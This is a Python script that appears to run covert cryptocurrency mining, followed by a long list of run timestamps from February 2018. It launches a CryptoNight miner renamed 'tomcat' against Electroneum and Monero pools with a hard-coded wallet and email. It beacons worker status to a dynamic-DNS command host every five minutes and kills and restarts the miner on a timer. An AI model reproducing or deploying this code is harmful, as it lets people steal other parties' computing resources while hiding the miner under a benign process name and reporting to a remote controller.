import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:05.216921
#2018-02-17 17:21:05.292723
#2018-02-17 19:09:03.101629
#2018-02-17 20:57:01.447512
#2018-02-17 22:42:06.473590
#2018-02-18 00:26:01.843843
#2018-02-18 02:16:07.418075
#2018-02-18 04:03:04.603332
#2018-02-18 05:52:03.301813
#2018-02-18 07:43:01.958393
#2018-02-18 09:29:06.811649
#2018-02-18 11:16:05.704071
#2018-02-18 13:02:06.719786
#2018-02-18 14:51:06.056492
#2018-02-18 16:39:01.562584
#2018-02-18 18:28:07.184774
#2018-02-18 20:17:04.915783
#2018-02-18 22:01:07.476994
#2018-02-18 23:50:08.812879
#2018-02-19 01:36:07.117290
#2018-02-19 03:27:02.007839
#2018-02-19 05:12:01.700870
#2018-02-19 06:58:04.756723
#2018-02-19 08:46:01.615721
#2018-02-19 10:36:01.339292
#2018-02-19 12:22:08.074103
#2018-02-19 14:10:07.524346
#2018-02-19 15:58:05.629262
#2018-02-19 17:48:01.519341
#2018-02-19 19:34:06.194695
#2018-02-19 21:21:07.590618
#2018-02-19 23:07:06.716695
#2018-02-20 00:49:07.145033
#2018-02-20 02:39:07.822235
#2018-02-20 04:28:08.181332
#2018-02-20 06:13:07.112254
#2018-02-20 07:58:06.758130
#2018-02-20 09:44:01.485845
#2018-02-20 11:28:04.133864
#2018-02-20 13:14:06.438078
#2018-02-20 15:00:13.188263
#2018-02-20 16:46:01.980693
#2018-02-20 18:34:09.778800
#2018-02-20 20:26:05.262404
#2018-02-20 22:12:05.372323
#2018-02-20 23:52:05.624780
#2018-02-21 01:38:02.117287
#2018-02-21 03:25:06.911331
#2018-02-21 05:12:07.495346
#2018-02-21 07:01:01.520210
#2018-02-21 08:46:04.111150
#2018-02-21 10:34:05.912261
#2018-02-21 12:22:04.556420
#2018-02-21 14:08:05.568740
#2018-02-21 15:53:05.748056
#2018-02-21 17:47:07.098403
#2018-02-21 19:32:06.038873
#2018-02-21 21:19:04.965135
#2018-02-21 23:05:09.394330
#2018-02-22 00:55:05.485188
#2018-02-22 02:43:07.310937
#2018-02-22 04:30:08.674322
#2018-02-22 06:16:08.184286
#2018-02-22 08:01:08.354942
#2018-02-22 09:49:07.031075
#2018-02-22 11:33:06.463412
#2018-02-22 13:20:04.128503
#2018-02-22 15:09:04.993665
#2018-02-22 16:52:09.497020
#2018-02-22 18:41:01.218099
#2018-02-22 20:32:07.425471
#2018-02-22 22:17:07.911214
#2018-02-23 00:04:08.040349
#2018-02-23 01:54:05.447369
#2018-02-23 03:42:07.568561
#2018-02-23 05:28:01.337163
#2018-02-23 07:13:02.088242
#2018-02-23 09:18:06.855028
#2018-02-23 11:25:01.795547
#2018-02-23 13:15:09.259197
#2018-02-23 15:02:02.212992
#2018-02-23 16:51:02.042680
#2018-02-23 18:40:10.570046
#2018-02-23 20:27:07.499658
#2018-02-23 22:15:10.688769
#2018-02-24 00:02:06.438158
#2018-02-24 01:53:06.160175
#2018-02-24 03:43:07.154063
#2018-02-24 05:32:02.258118
#2018-02-24 07:18:02.239239
#2018-02-24 09:08:04.157519
#2018-02-24 10:43:01.447905
#2018-02-24 12:26:05.675448
#2018-02-24 14:04:05.308651
#2018-02-24 15:39:07.237837
#2018-02-24 17:22:05.556076
#2018-02-24 18:54:01.294207
#2018-02-24 20:26:07.394182
#2018-02-24 21:56:04.167170
#2018-02-25 02:31:03.777403
#2018-02-25 06:11:02.027289
#2018-02-25 11:39:06.690770